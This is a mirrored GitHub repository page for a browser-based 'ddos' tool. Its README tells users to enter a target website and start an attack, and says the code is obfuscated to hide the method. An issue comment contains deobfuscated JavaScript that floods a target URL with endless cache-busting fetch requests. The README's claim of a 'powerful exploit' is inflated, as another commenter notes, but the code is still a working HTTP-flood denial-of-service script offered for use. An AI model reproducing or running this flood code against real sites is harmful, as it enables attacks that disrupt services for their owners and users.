Giter Club home page Giter Club logo

ddos's Introduction

powerfull exploitddos tool this script use an exploit in webserver

its very powerfull

usage:

open this web https://darksel0.github.io/ddos/ in your browser

use vps browser for more power

put target web and click start attack button

mybe show few ads

if show any ad after ads put target web and click start attack button

very important: attack webpage must active inbackground dont change browser tab

if you active other tab in browser the attack stops

I have obfuscated the codes to hide the exploit attack method

ddos's People

Contributors

darksel0 avatar

Stargazers

 avatar

Watchers

 avatar

Forkers

kyun1007

ddos's Issues

better than dos

this is much better than dos i think i will use it for miself thanks.

   var targetStats = {};
        var statsElement = document.getElementById("stats");

        function displayStats() {
            statsElement.innerHTML = "<table width=\"100%\"><thead><tr><th>URL</th><th>Requests</th><th>Errors</th></tr></thead><tbody>" +
                Object.entries(targetStats).map(([url, { number_of_requests: requests, number_of_errored_responses: errors }]) =>
                    `<tr><td>${url}</td><td>${requests}</td><td>${errors}</td></tr>`
                ).join("") + "</tbody></table>";
        }

        setInterval(displayStats, 1000);

        var requestQueue = [];

        async function fetchWithTimeout(url, options) {
            const abortController = new AbortController();
            const timeoutId = setTimeout(() => abortController.abort(), options.timeout);

            return fetch(url, {
                method: "GET",
                mode: "no-cors",
                headers: {
                    "cache-control": "no-cache",
                    "connection": "keep-alive"
                },
                signal: abortController.signal
            }).then(response => {
                clearTimeout(timeoutId);
                return response;
            }).catch(error => {
                clearTimeout(timeoutId);
                throw error;
            });
        }

        async function sendRequests(targetUrl) {
            for (let i = 0; ; ++i) {
                if (requestQueue.length > 1000) {
                    await requestQueue.shift();
                }
                let randomSuffix = i % 3 === 0 ? "" : "?" + Math.random() * 100000;
                requestQueue.push(fetchWithTimeout(targetUrl + randomSuffix, { timeout: 1000 })
                    .catch(error => {
                        if (error.code === 20) {
                            return;
                        }
                        targetStats[targetUrl].number_of_errored_responses++;
                    }).then(response => {
                        if (response && !response.ok) {
                            targetStats[targetUrl].number_of_errored_responses++;
                        }
                        targetStats[targetUrl].number_of_requests++;
                    }));
            }
        }

        function startAttack() {
            const targetUrl = document.getElementById("urlInput").value;

            localStorage.setItem("url", targetUrl);
            if (targetUrl) {
                targetStats[targetUrl] = {
                    number_of_requests: 0,
                    number_of_errored_responses: 0
                };
                sendRequests(targetUrl);
            }
        }

        function stopAttack() {
            requestQueue = [];
        }


        document.getElementById("urlInput").value = localStorage.getItem("url");

dont lie

dont say something is too powerfull when you are just fetching a url in a loop

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.